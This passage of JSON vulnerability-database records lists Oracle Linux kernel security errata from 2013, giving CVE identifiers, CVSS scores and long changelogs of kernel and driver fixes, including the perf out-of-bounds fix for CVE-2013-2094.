"ELSA-2013-0830", "href": "http://linux.oracle.com/errata/ELSA-2013-0830.html", "title": "kernel security update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:02", "bulletinFamily": "unix", "cvelist": ["CVE-2013-2017", "CVE-2013-1943", "CVE-2013-2094", "CVE-2013-1935"], "description": "[2.6.32-358.11.1]\n- [kernel] perf: fix perf_swevent_enabled array out-of-bound access (Petr Matousek) [962793 962794] {CVE-2013-2094}\n[2.6.32-358.10.1]\n- [scsi] be2iscsi : Fix the NOP-In handling code path (Nikola Pajkovsky) [955504 947550]\n- [scsi] be2iscsi: Fix memory leak in control path of driver (Rob Evers) [955504 947550]\n- [virt] kvm: validate userspace_addr of memslot (Petr Matousek) [950496 950498] {CVE-2013-1943}\n- [virt] kvm: fix copy to user with irq disabled (Michael S. Tsirkin) [949985 906602] {CVE-2013-1935}\n- [net] veth: Dont kfree_skb() after dev_forward_skb() (Jiri Benc) [957712 957713] {CVE-2013-2017}\n- [net] tcp: Reallocate headroom if it would overflow csum_start (Thomas Graf) [954298 896233]\n- [net] tcp: take care of misalignments (Thomas Graf) [954298 896233]\n- [net] skbuff.c cleanup (Thomas Graf) [954298 896233]\n- [idle] intel_idle: Initialize driver_data correctly in ivb_cstates on IVB processor (Prarit Bhargava) [960864 953630]\n- [x86] Prevent panic in init_memory_mapping() when booting more than 1TB on AMD systems (Larry Woodman) [962482 869736]\n- [mm] enforce mmap_min_addr on x86_64 (Rik van Riel) [961431 790921]\n- [mm] optional next-fit policy for arch_get_unmapped_area (Rik van Riel) [961431 790921]\n- [mm] fix quadratic behaviour in get_unmapped_area_topdown (Rik van Riel) [961431 790921]\n- [scsi] Revert: qla2xxx: Optimize existing port name server query matching (Chad Dupuis) [950529 924804]\n- [scsi] Revert: qla2xxx: Avoid losing any fc ports when loop id's are exhausted (Chad Dupuis) [950529 924804]\n- [fs] defer do_filp_open() access checks to may_open() (Eric Sandeen) [928683 920752]\n- [md] dm thin: bump the target version numbers (Mike Snitzer) [924823 922931]\n- [md] dm-thin: fix discard corruption (Mike Snitzer) [924823 922931]\n- [md] persistent-data: rename node to btree_node (Mike Snitzer) [924823 922931]\n- [md] dm: fix limits initialization when there are no data devices (Mike Snitzer) [923096 908851]\n[2.6.32-358.9.1]\n- [fs] nfs: Fix handling of revoked delegations by setattr (Steve Dickson) [960415 952329]\n- [fs] nfs: Return the delegation if the server returns NFS4ERR_OPENMODE (Steve Dickson) [960415 952329]\n- [fs] nfs: Fix another potential state manager deadlock (Steve Dickson) [960436 950598]\n- [fs] nfs: Fix another open/open_recovery deadlock (Steve Dickson) [960433 916806]\n- [fs] nfs: Hold reference to layout hdr in layoutget (Steve Dickson) [960429 916726]\n- [fs] nfs: add 'pnfs_' prefix to get_layout_hdr() and put_layout_hdr() (Steve Dickson) [960429 916726]\n- [fs] nfs: nfs4_open_done first must check that GETATTR decoded a file type (Steve Dickson) [960412 916722]\n- [net] sunrpc: Dont start the retransmission timer when out of socket space (Steve Dickson) [960426 916735]\n- [fs] nfs: Dont use SetPageError in the NFS writeback code (Steve Dickson) [960420 912867]\n- [fs] nfs: Dont decode skipped layoutgets (Steve Dickson) [927294 904025]\n- [fs] nfs: nfs4_proc_layoutget returns void (Steve Dickson) [927294 904025]\n- [fs] nfs: defer release of pages in layoutget (Steve Dickson) [927294 904025]\n- [fs] nfs: Use kcalloc() when allocating arrays (Steve Dickson) [927294 904025]\n- [fs] nfs: Fix an ABBA locking issue with session and state serialisation (Steve Dickson) [960417 912842]\n- [fs] nfs: Fix a race in the pNFS return-on-close code (Steve Dickson) [960417 912842]\n- [fs] nfs: Do not accept delegated opens when a delegation recall is in effect (Steve Dickson) [960417 912842]\n- [fs] nfs: Fix a reboot recovery race when opening a file (Steve Dickson) [952613 908524]\n- [fs] nfs: Ensure delegation recall and byte range lock removal don't conflict (Steve Dickson) [952613 908524]\n- [fs] nfs: Fix up the return values of nfs4_open_delegation_recall (Steve Dickson) [952613 908524]\n- [fs] nfs: Dont lose locks when a server reboots during delegation return (Steve Dickson) [952613 908524]\n- [fs] nfs: Move nfs4_wait_clnt_recover and nfs4_client_recover_expired_lease (Steve Dickson) [952613 908524]\n- [fs] nfs: Add NFSDBG_STATE (Steve Dickson) [952613 908524]\n- [fs] nfs: nfs_inode_return_delegation() should always flush dirty data (Steve Dickson) [952613 908524]\n- [fs] nfs: nfs_client_return_marked_delegations cant flush data (Steve Dickson) [952613 908524]\n- [fs] nfs: Prevent deadlocks between state recovery and file locking (Steve Dickson) [952613 908524]\n- [fs] nfs: Allow the state manager to mark an open_owner as being recovered (Steve Dickson) [952613 908524]\n- [kernel] seqlock: Dont smp_rmb in seqlock reader spin loop (Steve Dickson) [952613 908524]\n- [kernel] seqlock: add 'raw_seqcount_begin()' function (Steve Dickson) [952613 908524]\n- [kernel] seqlock: optimise seqlock (Steve Dickson) [952613 908524]\n- [fs] nfs: don't allow nfs_find_actor to match inodes of the wrong type (Jeff Layton) [921964 913660]\n- [net] sunrpc: Add barriers to ensure read ordering in rpc_wake_up_task_queue_locked (Dave Wysochanski) [956979 840860]\n[2.6.32-358.8.1]\n- [fs] raw: don't call set_blocksize when not changing the blocksize (Jeff Moyer) [951406 909482]\n- [x86] Allow greater than 1TB of RAM on AMD x86_64 sytems (Larry Woodman) [952570 876275]\n- [netdrv] ixgbe: Only set gso_type to SKB_GSO_TCPV4 as RSC does not support IPv6 (Michael S. Tsirkin) [927292 908196]\n- [netdrv] bnx2x: set gso_type (Michael S. Tsirkin) [927292 908196]\n- [netdrv] qlcnic: set gso_type (Michael S. Tsirkin) [927292 908196]\n- [netdrv] ixgbe: fix gso type (Michael S. Tsirkin) [927292 908196]\n- [fs] gfs2: Allocate reservation structure before rename and link (Robert S Peterson) [924847 922999]\n[2.6.32-358.7.1]\n- [infiniband] ipoib: Add missing locking when CM object is deleted (Doug Ledford) [928817 913645]", "edition": 4, "modified": "2013-06-11T00:00:00", "published": "2013-06-11T00:00:00", "id": "ELSA-2013-0911", "href": "http://linux.oracle.com/errata/ELSA-2013-0911.html", "title": "kernel security, bug fix, and enhancement update", "type": "oraclelinux", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:34:10", "bulletinFamily": "unix", "cvelist": ["CVE-2013-1797", "CVE-2013-1848", "CVE-2013-1860", "CVE-2013-1792", "CVE-2012-6542", "CVE-2013-0349", "CVE-2013-1774", "CVE-2013-1929", "CVE-2013-1979", "CVE-2012-4542", "CVE-2013-2094", "CVE-2013-1796", "CVE-2013-1798"], "description": "[2.6.39-400.109.1] \r\n- while removing a non-empty directory, the kernel dumps a message: (rmdir,21743,1):ocfs2_unlink:953 ERROR: status = -39 (Xiaowei.Hu) [Orabug: 16790405] \r\n- stop mig handler when lockres in progress ,and return -EAGAIN (Xiaowei.Hu) [Orabug: 16876446] \r\n \n[2.6.39-400.108.1] \r\n- Revert 'dlmglue race condition,wrong lockres_clear_pending' (Maxim Uvarov) [Orabug: 16897450] \r\n- Suppress the error message from being printed in ocfs2_rename (Xiaowei.Hu) [Orabug: 16790405] \r\n- fnic: return zero on fnic_reset() success (Joe Jin) [Orabug: 16885029] \r\n \n[2.6.39-400.107.1] \r\n- xen/pci: Track PVHVM PIRQs. (Zhenzhong Duan) \r\n- ocfs2_prep_new_orphaned_file return ret (Xiaowei.Hu) [Orabug: 16823825] \r\n- Revert 'Btrfs: remove ->dirty_inode' (Guangyu Sun) [Orabug: 16841843] \r\n- bonding: emit event when bonding changes MAC (Weiping Pan) [Orabug: 16750157] \r\n- net: fix incorrect credentials passing (Linus Torvalds) [Orabug: 16836975] {CVE-2013-1979} \r\n- tg3: fix length overflow in VPD firmware parsing (Kees Cook) [Orabug: 16836958] {CVE-2013-1929} \r\n- USB: cdc-wdm: fix buffer overflow (Oliver Neukum) [Orabug: 16836943] {CVE-2013-1860} \r\n- ext3: Fix format string issues (Lars-Peter Clausen) [Orabug: 16836934] {CVE-2013-1848} \r\n- cnic: dont use weak dependencies for ipv6 (Jerry Snitselaar) [Orabug: 16780307] \r\n- Revert 'drm/i915: correctly order the ring init sequence' (Guangyu Sun) [Orabug: 16486689] \r\n- x86/boot-image: Dont leak phdrs in arch/x86/boot/compressed/misc.c::Parse_elf() (Jesper Juhl) [Orabug: 16833437] \r\n- spec: add /boot/vmlinuz*.hmac needed for fips mode (John Haxby) [Orabug: 16807114] \r\n- perf: Treat attr.config as u64 in perf_swevent_init() (Tommi Rantala) [Orabug: 16808734] {CVE-2013-2094} \r\n- spec: ol6 add multipath version deps (Maxim Uvarov) [Orabug: 16763586] \r\n- Fix EN driver to work with newer FWs based on latest mlx4_core (Yuval Shaia) [Orabug: 16748891] \r\n- xen-netfront: delay gARP until backend switches to Connected (Laszlo Ersek) \r\n- fuse: enhance fuse dev to be numa aware (Srinivas Eeda) [Orabug: 16218187] \r\n- fuse: add fuse numa node struct (Srinivas Eeda) [Orabug: 16218187] \r\n- fuse: add numa mount option (Srinivas Eeda) [Orabug: 16218187] \r\n- xen-blkfront: use a different scatterlist for each request (Roger Pau Monne) [Orabug: 16660413] \r\n- bonding: allow all slave speeds (Jiri Pirko) [Orabug: 16759490] \r\n- dlmglue race condition,wrong lockres_clear_pending (Xiaowei.Hu) [Orabug: 13611997] \r\n \n[2.6.39-400.106.0] \r\n- spec: fix suffix order of a directory name (Guangyu Sun) [Orabug: 16682371] \r\n- Merge tag 'v2.6.39-400#qu4bcom' of git://ca-git.us.oracle.com/linux-snits-public into uek2-master (Maxim Uvarov) [Orabug: 16626319] \r\n- Merge tag 'v2.6.39-400#qu4qlge' of git://ca-git.us.oracle.com/linux-snits-public into uek2-master (Maxim Uvarov) [Orabug: 16732027] \r\n- Merge tag 'v2.6.39-400#qu4lpfc' of git://ca-git.us.oracle.com/linux-snits-public into uek2-master (Maxim Uvarov) [Orabug: 16749881] \r\n- block: default SCSI command filter does not accomodate commands overlap across device classes (Jamie Iles) [Orabug: 16387137] {CVE-2012-4542} \r\n- Parallel mtrr init between cpus (Zhenzhong Duan) [Orabug: 16434164] \r\n- fuse: return -EGAIN if not connected (Josef Bacik) [Orabug: 16740418] \r\n- qlcnic: update to version 5.2.29.45 (Jerry Snitselaar) [Orabug: 16694438] \r\n- qlge: update to version 1.00.00.32 (Jerry Snitselaar) [Orabug: 16732027] \r\n- lpfc: Corrected Copyright string (Gairy Grannum) [Orabug: 16749881] \r\n- lpfc: enable BlockGuard Support by default (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.37: Fixed exhausted retry for plogi to nameserver. (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.37: Fixed ELS_REC received on the unsolicited receive queue (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.36: Correct mask error (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.36: Correct buffer length overrun (James Smart) [Orabug: 16749881] \r\n- lpfc: typo cleanup (Linus Torvalds) [Orabug: 16749881] \r\n- lpfc 8.3.36: Update DIF support for passthru/strip/insert (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.36: Fix bug with Target Resets and FCP2 devices (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.35: Fixed not reporting logical link speed to SCSI midlayer when QoS not on (James Smart) [Orabug: 16749881] \r\n- lpfc: Update lpfc version for 8.3.7.10.4p driver release (Gairy Grannum) [Orabug: 16749881] \r\n- lpfc 8.3.35: Correct request_firmware use that was increasing boot times (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.35: Correct request_firmware use that was increasing boot times (James Smart) [Orabug: 16749881] \r\n- lpfc: Fixed driver handling of CLEAR_LA with NPIV enabled causing SID=0 frames out (James Smart) [Orabug: 16749881] \r\n- scsi: fix lpfc build when wmb() is defined as mb() (Randy Dunlap) [Orabug: 16749881] \r\n- lpfc: Reduced tmo value set to FLOGI WQE for quick recovery from FLOGI sequence timeout (James Smart) [Orabug: 16749881] \r\n- lpfc: Add log message when completes with clean address bit set to zero (James Smart) [Orabug: 16749881] \r\n- lpfc: Fixed driver vector mapping to CPU affinity (James Smart) [Orabug: 16749881] \r\n- lpfc: Fixed driver vector mapping to CPU affinity (James Smart) [Orabug: 16749881] \r\n- lpfc: Fixed iocb flags not being reset for scsi commands (James Smart) [Orabug: 16749881] \r\n- lpfc: Fixed system panic during EEH recovery due to midlayer acting on outstanding I/O (James Smart) [Orabug: 16749881] \r\n- lpfc: Fixed not returning FAILED status when SCSI invoking host reset handler failed (James Smart) [Orabug: 16749881] \r\n- lpfc: Fixed bad book keeping in posting els sgls to port (James Smart) [Orabug: 16749881] \r\n- lpfc: Fixed deadlock between hbalock and nlp_lock use (James Smart) [Orabug: 16749881] \r\n- lpfc: Fixed BlockGuard to take advantage of rdprotect/wrprotect info when available (James Smart) [Orabug: 16749881] \r\n- lpfc: Reduced spinlock contention on SCSI buffer list (James Smart) [Orabug: 16749881] \r\n- lpfc: Fixed crash when processing bsgs sg list with high memory pages (James Smart) [Orabug: 16749881] \r\n- lpfc: Fix lpfc_fcp_look_ahead module parameter (James Smart) [Orabug: 16749881] \r\n- lpfc: Fix driver issues with SCSI Host reset (James Smart) [Orabug: 16749881] \r\n- lpfc: Doorbell formation information logged in dual-chute mode WQ and RQ setup (James Smart) [Orabug: 16749881] \r\n- lpfc: Fix driver issues with large s/g lists for BlockGuard (James Smart) [Orabug: 16749881] \r\n- lpfc: Fix driver issues with large lpfc_sg_seg_cnt values (James Smart) [Orabug: 16749881] \r\n- lpfc: Fixed pt2pt and loop discovery problems on topology changes. (James Smart) [Orabug: 16749881] \r\n- lpfc: Remove driver dependency on HZ (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.38: Fixed async FCF modified event to in-use FCF failure to trigger recovery (James Smart) [Orabug: 16749881] \r\n- lpfc: Fixed BlockGuard error reporting (James Smart) [Orabug: 16749881] \r\n- lpfc: Fixed VPI allocation issues after firmware dump is performed (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.38: Fixed potential mis-interpretation of READ_TOPOLOGY reserved fields (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.38: Fix default value for lpfc_enable_rrq. (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.38: Fixed circular locking dependency and inconsistent lock state issues (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.38: Fixed PT2PT bring up problem for FC SLI4. (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.38: Fixed OXID reuse issue. (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.38: Fixed async FCF modified event to in-use FCF failure to trigger recovery (James Smart) [Orabug: 16749881] \r\n- lpfc: fix potential NULL pointer dereference in lpfc_sli4_rq_put() (Wei Yongjun) [Orabug: 16749881] \r\n- lpfc 8.3.38: Fixed deadlock condition in FCF round robin handling (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.38: Fixed bsg timeout handling issues that would result in crashes (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.38: Fixed NMI watch dog panics when resetting the hba. (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.38: Fixed degraded performance after cable pulls (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.37: Provide support for change_queue_type (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.37: Fixed infinite loop in lpfc_sli4_fcf_rr_next_index_get. (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.37: Fixed crash due to SLI Port invalid resource count (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.37: Fix potential memory corruption bug (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.37: Provide support for FCoE protocol dual-chute (ULP) operation (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.37: Fixed stale ndlp state when the node is marked for deferred removal. (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.37: Removed use of NOP mailboxes for interrupt verification (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.37: Removed use of NOP mailboxes for interrupt verification (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.35: Fixed not checking solicition in progress bit when verifying FCF record for use (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.35: Fixed PRLI not being retried if a LS_RJT with a reason (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.35: Correct request_firmware use that was increasing boot times (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.35: Expand I/O channel support for large systems (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.35: Fix interrupt delay multipler conversion for eq_create (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.34: Correct typecasts for snprintf messages (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.33: Add Interrupts per second stats via debugfs (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.34: Adjust IO Channels to 1 when INTx (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.34: Fix number of IO channels to match CPUs (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.33: Add debugfs interface to display SLI queue information (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.33: Tie parallel I/O queues into separate MSIX vectors (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.33: Allow per-hba interrupt rate tuning (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.33: Tie parallel I/O queues into separate MSIX vectors (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.33: Fixed debugfs queInfo to include queue stats (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.33: Add lpfc_fcp_look_ahead module parameter (James Smart) [Orabug: 16749881] \r\n- lpfc: Fix driver issues with SCSI Host reset (James Smart) [Orabug: 16749881] \r\n- lpfc: Doorbell formation information logged in dual-chute mode WQ and RQ setup (James Smart) [Orabug: 16749881] \r\n- lpfc: Fix driver issues with large s/g lists for BlockGuard (James Smart) [Orabug: 16749881] \r\n- lpfc: Fix driver issues with large lpfc_sg_seg_cnt values (James Smart) [Orabug: 16749881] \r\n- lpfc: Fixed pt2pt and loop discovery problems on topology changes. (James Smart) [Orabug: 16749881] \r\n- lpfc: Remove driver dependency on HZ (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.38: Fixed async FCF modified event to in-use FCF failure to trigger recovery (James Smart) [Orabug: 16749881] \r\n- lpfc: Fixed BlockGuard error reporting (James Smart) [Orabug: 16749881] \r\n- lpfc: Fixed VPI allocation issues after firmware dump is performed (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.38: Fixed potential mis-interpretation of READ_TOPOLOGY reserved fields (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.38: Fix default value for lpfc_enable_rrq. (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.38: Fixed circular locking dependency and inconsistent lock state issues (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.38: Fixed PT2PT bring up problem for FC SLI4. (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.38: Fixed OXID reuse issue. (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.38: Fixed async FCF modified event to in-use FCF failure to trigger recovery (James Smart) [Orabug: 16749881] \r\n- lpfc: fix potential NULL pointer dereference in lpfc_sli4_rq_put() (Wei Yongjun) [Orabug: 16749881] \r\n- lpfc 8.3.38: Fixed deadlock condition in FCF round robin handling (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.38: Fixed bsg timeout handling issues that would result in crashes (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.38: Fixed NMI watch dog panics when resetting the hba. (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.38: Fixed degraded performance after cable pulls (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.37: Provide support for change_queue_type (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.37: Fixed infinite loop in lpfc_sli4_fcf_rr_next_index_get. (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.37: Fixed crash due to SLI Port invalid resource count (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.37: Fix potential memory corruption bug (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.37: Provide support for FCoE protocol dual-chute (ULP) operation (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.37: Fixed stale ndlp state when the node is marked for deferred removal. (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.37: Removed use of NOP mailboxes for interrupt verification (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.37: Removed use of NOP mailboxes for interrupt verification (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.35: Fixed not checking solicition in progress bit when verifying FCF record for use (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.35: Fixed PRLI not being retried if a LS_RJT with a reason (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.35: Correct request_firmware use that was increasing boot times (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.35: Expand I/O channel support for large systems (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.35: Fix interrupt delay multipler conversion for eq_create (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.34: Correct typecasts for snprintf messages (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.33: Add Interrupts per second stats via debugfs (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.34: Adjust IO Channels to 1 when INTx (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.34: Fix number of IO channels to match CPUs (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.33: Add debugfs interface to display SLI queue information (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.33: Tie parallel I/O queues into separate MSIX vectors (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.33: Allow per-hba interrupt rate tuning (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.33: Tie parallel I/O queues into separate MSIX vectors (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.33: Fixed debugfs queInfo to include queue stats (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.33: Add lpfc_fcp_look_ahead module parameter (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.33: Allow per-hba interrupt rate tuning (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.33: Parallelize SLI-4 Q distribution (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.33: Allow per-hba interrupt rate tuning (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.33: Make I/O to hw queue distribution algorithm a module parameter (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.33: Change Naming convention for SLI4 Interrupt vector (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.33: Allow per-hba interrupt rate tuning (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.33: Tie parallel I/O queues into separate MSIX vectors (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.33: Formally separate lpfc_sli_ring SLI-3 and SLI-4 variantions (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.33: Add Interrupts per second stats via debugfs (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.33: Parallelize SLI-4 Q distribution (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.33: Misc changes to optimize critical path (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.33: Formally separate lpfc_sli_ring SLI-3 and SLI-4 variantions (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.33: Convert to no SCSI host lock in queuecommand (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.33: Convert to no SCSI host lock in queuecommand (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.33: Convert to no SCSI host lock in queuecommand (James Smart) [Orabug: 16749881] \r\n- lpfc 8.3.33: Add debugfs interface to display SLI queue information (James Smart) [Orabug: 16749881] \r\n- bnx2x: update to broadcom version 1.76.54 (Jerry Snitselaar) \r\n- bnx2fc: update to broadcom version 2.3.4 (Jerry Snitselaar) \r\n- bnx2i: update to broadcom version 2.7.6.1d (Jerry Snitselaar) \r\n- cnic: update to broadcom version 2.5.16g (Jerry Snitselaar) \r\n- bnx2: update to broadcom version 2.2.3n (Jerry Snitselaar) \r\n- tg3: update to broadcom version 3.129d (Jerry Snitselaar) \r\n- drivers:net: dma_alloc_coherent: use __GFP_ZERO instead of memset(, 0) (Joe Perches) \r\n- drivers:net: Remove dma_alloc_coherent OOM messages (Joe Perches) \r\n- be2net: Use new F/W mailbox cmd to manipulate interrupts. (Somnath Kotur) \r\n- be2net: enable interrupts in be_probe() (RoCE and other ULPs need them) (Somnath Kotur) \r\n- be2net: Update copyright year (Vasundhara Volam) \r\n- be2net: use CSR-BAR SEMAPHORE reg for BE2/BE3 (Sathya Perla) \r\n- benet: Wait f/w POST until timeout (Gavin Shan) \r\n- be2net: remove BUG_ON() in be_mcc_compl_is_new() (Sathya Perla) \r\n- be2net: update driver version to 4.6.x (Sathya Perla) \r\n- be2net: fix re-loaded PF driver to re-gain control of its VFs (Sathya Perla) \r\n- be2net: Updating Module Author string and log message string to 'Emulex Corporation' (Sarveshwar Bandi) \r\n- be2net: fix unconditionally returning IRQ_HANDLED in INTx (Sathya Perla) \r\n- ethtool: fix drvinfo strings set in drivers (Jiri Pirko) \r\n- be2net: fix wrong frag_idx reported by RX CQ (Sathya Perla) \r\n- be2net: fix be_close() to ensure all events are acked (Sathya Perla) \r\n- drivers/net: fix up function prototypes after __dev* removals (Greg Kroah-Hartman) \r\n- be2net: remove __dev* attributes (Bill Pemberton) \r\n- [scsi] fnic driver update to 1.5.0.41 (Maxim Uvarov) \r\n- [SCSI] sd: Permit merged discard requests (Martin K. Petersen) \r\n- [SCSI] scsi_dh_alua: backoff alua rtpg retry linearly vs. geometrically (Rob Evers) \r\n- [SCSI] scsi_dh_alua: retry alua rtpg extended header for illegal request response (Rob Evers) \r\n- [SCSI] scsi_dh_alua: implement 'implied transition timeout' (Rob Evers) \r\n- [SCSI] scsi_dh_alua: Fix the time inteval for alua rtpg commands (Moger, Babu) \r\n- [SCSI] scsi_dh_alua: Decrease retry interval (Hannes Reinecke) \r\n- [SCSI] scsi_dh_alua: Fix Erroneous TPG ID check (Hannes Reinecke) \r\n- [SCSI] scsi_dh_alua: always update TPGS status on activate (Hannes Reinecke) \r\n- [SCSI] scsi scan: dont fail scans when host is in recovery (Mike Christie) \r\n- [SCSI] scsi_lib: pause between error retries (James Smart) \r\n- RDS: Fixes race conditions that may lead to non-optimal paths, causing lower throughput. (Bang Nguyen) [Orabug: 16571410] \r\n- Merge tag 'v2.6.39-400.20.1.16313854' of git://ca-git.us.oracle.com/linux-uek-2.6.39-ofed into uek2-master (Maxim Uvarov) [Orabug: 16313854] \r\n- sched: Use resched IPI to kick off the nohz idle balance (Suresh Siddha) [Orabug: 16424589] \r\n- x86, efi/efi.c: Suppress error message when desc_size not equal size from UEFI Porting from Yinghais patch from following link http://permalink.gmane.org/gmane.linux.kernel/1131668 x86, efi: Only print warning when desc_size is smaller than defined one. Used to suppress the error message when desc_size not equal size from UEFI. (ethan.zhao) [Orabug: 15814305] \r\n- SPEC: add x86_energy_perf_policy tool Add tools/power/x86/x86_energy_perf_policy/x86_energy_perf_policy to ol5 ol6 uek kernel rpmbuild spec file and create shell wrapper for this tool. (ethan.zhao) [Orabug: 16036151] \r\n- igbvf: Update to 2.0.4 (ethan.zhao) [Orabug: 16626308] \r\n- ixgbevf: Update to 2.8.7 (ethan.zhao) [Orabug: 16626308] \r\n- ixgbe: Update to 3.14.5 (ethan.zhao) [Orabug: 16626308] \r\n- igb: Update to 4.1.2 (ethan.zhao) [Orabug: 16626308] \r\n- e1000e: Update to 2.3.2 (ethan.zhao) [Orabug: 16626308] \r\n \n[2.6.39-400.105.0] \r\n- Revert 'Parallel mtrr init between cpus' (Maxim Uvarov) \r\n \n[2.6.39-400.104.0] \r\n- Merge tag 'v2.6.39-400.20.1.16313854' of git://ca-git.us.oracle.com/linux-uek-2.6.39-ofed into uek2-master (Maxim Uvarov) [Orabug: 16313854] \r\n- spec: fix instalation if hardlink is installed (Maxim Uvarov) \r\n- Parallel mtrr init between cpus (Zhenzhong Duan) \r\n- KVM: x86: Convert MSR_KVM_SYSTEM_TIME to use gfn_to_hva_cache functions (CVE-2013-1797) (Andy Honig) [Orabug: 16711660] {CVE-2013-1797} \r\n- Bluetooth: Fix incorrect strncpy() in hidp_setup_hid() (Anderson Lizardo) [Orabug: 16711065] {CVE-2013-0349} \r\n- USB: io_ti: Fix NULL dereference in chase_port() (Wolfgang Frisch) [Orabug: 16425358] {CVE-2013-1774} \r\n- keys: fix race with concurrent install_user_keyrings() (David Howells) [Orabug: 16493354] {CVE-2013-1792} \r\n- KVM: Fix bounds checking in ioapic indirect register reads (CVE-2013-1798) (Andy Honig) [Orabug: 16710951] {CVE-2013-1798} \r\n- KVM: x86: fix for buffer overflow in handling of MSR_KVM_SYSTEM_TIME (CVE-2013-1796) (Andy Honig) [Orabug: 16710806] {CVE-2013-1796} \r\n- be2iscsi : Bump the driver version (John Soni Jose) [Orabug: 16704553] \r\n- be2iscsi: Fix issue in passing the exp_cmdsn and max_cmdsn (John Soni Jose) [Orabug: 16704553] \r\n- be2iscsi: Fix possible reentrancy issue in be_iopoll (John Soni Jose) [Orabug: 16704553] \r\n- be2iscsi: Fix the copyright information (John Soni Jose) [Orabug: 16704553] \r\n- be2iscsi: Fix checking Adapter state while establishing CXN (John Soni Jose) [Orabug: 16704553] \r\n- be2iscsi: Fix dynamic CID allocation Mechanism in driver (John Soni Jose) [Orabug: 16704553] \r\n- be2iscsi : Fix the NOP-In handling code path (John Soni Jose) [Orabug: 16704553] \r\n- be2iscsi: Fix the Port Link Status issue (John Soni Jose) [Orabug: 16704553] \r\n- beiscsi: Fix displaying the Active Session Count from driver (John Soni Jose) [Orabug: 16704553] \r\n- be2iscsi: 